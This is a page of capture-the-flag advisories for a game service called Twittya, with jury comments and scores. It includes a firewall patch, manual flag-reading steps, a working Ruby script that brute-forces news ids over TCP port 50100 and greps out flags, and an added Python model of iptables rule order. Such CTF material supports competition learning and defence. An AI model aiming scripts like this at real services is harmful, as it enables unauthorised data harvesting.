Twittya Advisories
Service: | Twittya |
---|
Text: | The Twittya service has an open port 50100, which is only required for localhost (access from the lighthttp app). Deny it by using iptables:
iptables -A INPUT --protocol tcp --dport 50100 -j DROP
iptables -I INPUT 1 -s 127.0.0.1 --protocol tcp --dport 50100 -j ACCEPT
|
---|
Jury comment: | Correct. To raise your score, provide an exploit that gets flags. |
---|
Score: | 1/3 point |
---|
Service: | Twittya |
---|
Text: | news <number> <- in some cases you get a list of numbers
view_news <number from the list>
you get a flag |
---|
Jury comment: | Patch? "in some cases" - in which cases? |
---|
Score: | 1/3 point |
---|
Service: | Twittya |
---|
Text: | Exploit that will brute-force the view_topics and grep for flags
require 'socket'
require 'timeout'

class Twittya
  attr_accessor :sock

  # Open a TCP connection to the service port (50100).
  def connect(ip)
    @sock = TCPSocket.new(ip, 50100)
    @ip = ip.to_s
  end

  # Send a command and collect the reply lines until the 0.2 s timeout fires.
  def get_list(instr)
    @sock.puts(instr)
    users = []
    begin
      Timeout.timeout(0.2) do
        loop do
          string = @sock.gets.strip
          users << string if string != "OK"
        end
      end
    rescue
      # puts $@,$!
    end
    return users.sort
  end

  def get_users()
    get_list("users")
  end

  # Walk 21 consecutive news ids, starting from the id saved in a file
  # named after the target IP (65 if no such file exists).
  def view_news
    last = 0
    begin
      first = File.read(@ip).lines.first.strip.to_i
    rescue
      puts $@, $!
      first = 65
    end
    puts "beginning with #{first}"
    (first..first + 20).each do |i|
      get_list("view_news\n#{i}\n").each do |str|
        # Flag format: 31 word characters followed by '='.
        if str =~ /(\w{31}=)/
          last = i
          puts $1
          File.open(@ip, 'w') { |f| f.write(i) }
        end
      end
    end
  end
end

t = Twittya.new
puts "pw0ning #{ARGV[0]}"
t.connect(ARGV[0])
t.view_news
|
---|
Jury comment: | Well done, but a little bit late |
---|
Score: | 1/3 point |
---|
Service: | Twittya |
---|
Text: | You can go to 10.23.X.3:10050 with a browser, create a user, log in there and go to "Subscriptions".
Then subscribe to any user by "Add user" and see the news of this user by pressing on their names on the left side. Flags lie there openly. |
---|
Jury comment: | Nice! Patch? |
---|
Score: | 2/3 points |
---|
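
The following is an added example, not part of any submitted advisory: a simplified first-match model of the INPUT chain that replays the two iptables commands from the first advisory and shows why the ACCEPT rule has to be inserted at position 1. The addresses 10.23.1.3 and 10.23.1.7 are constructed, and only the options used in that advisory are modelled.

```python
import ipaddress
import shlex

# The two commands from the advisory, in the order given there.
PAGE_RULES = [
    "iptables -A INPUT --protocol tcp --dport 50100 -j DROP",
    "iptables -I INPUT 1 -s 127.0.0.1 --protocol tcp --dport 50100 -j ACCEPT",
]

def build(commands):
    """Replay -A/-I commands into an ordered rule list (simplified model)."""
    chain = []
    for command in commands:
        args = shlex.split(command)[1:]            # drop 'iptables'
        rule = {"src": ipaddress.ip_network("0.0.0.0/0"), "dport": None, "target": None}
        pos, i = len(chain), 0                     # -A: append at the end
        while i < len(args):
            opt = args[i]
            if opt == "-I":                        # -I CHAIN N: insert as rule N
                pos = int(args[i + 2]) - 1
                i += 3
                continue
            if opt == "-s":
                rule["src"] = ipaddress.ip_network(args[i + 1])
            elif opt == "--dport":
                rule["dport"] = int(args[i + 1])
            elif opt == "-j":
                rule["target"] = args[i + 1]
            elif opt not in ("-A", "--protocol"):
                raise ValueError(f"option not modelled: {opt}")
            i += 2
        chain.insert(pos, rule)
    return chain

def verdict(chain, src, dport, policy="ACCEPT"):
    """First matching rule decides; otherwise the chain policy applies."""
    for rule in chain:
        if ipaddress.ip_address(src) in rule["src"] and rule["dport"] in (None, dport):
            return rule["target"]
    return policy

def report(commands):
    chain = build(commands)
    # 10.23.1.3 and 10.23.1.7 are constructed addresses (own host IP, remote team).
    return {src: verdict(chain, src, 50100) for src in ("127.0.0.1", "10.23.1.3", "10.23.1.7")}

if __name__ == "__main__":
    print(report(PAGE_RULES))
    # Same two rules, both appended: the DROP now comes first.
    print(report([PAGE_RULES[0], PAGE_RULES[1].replace("-I INPUT 1", "-A INPUT")]))
```

The 10.23.1.3 row is the case to check on a real host: a local client that connects to the machine's own non-loopback address arrives with that address as its source, so a rule matching only `-s 127.0.0.1` does not accept it.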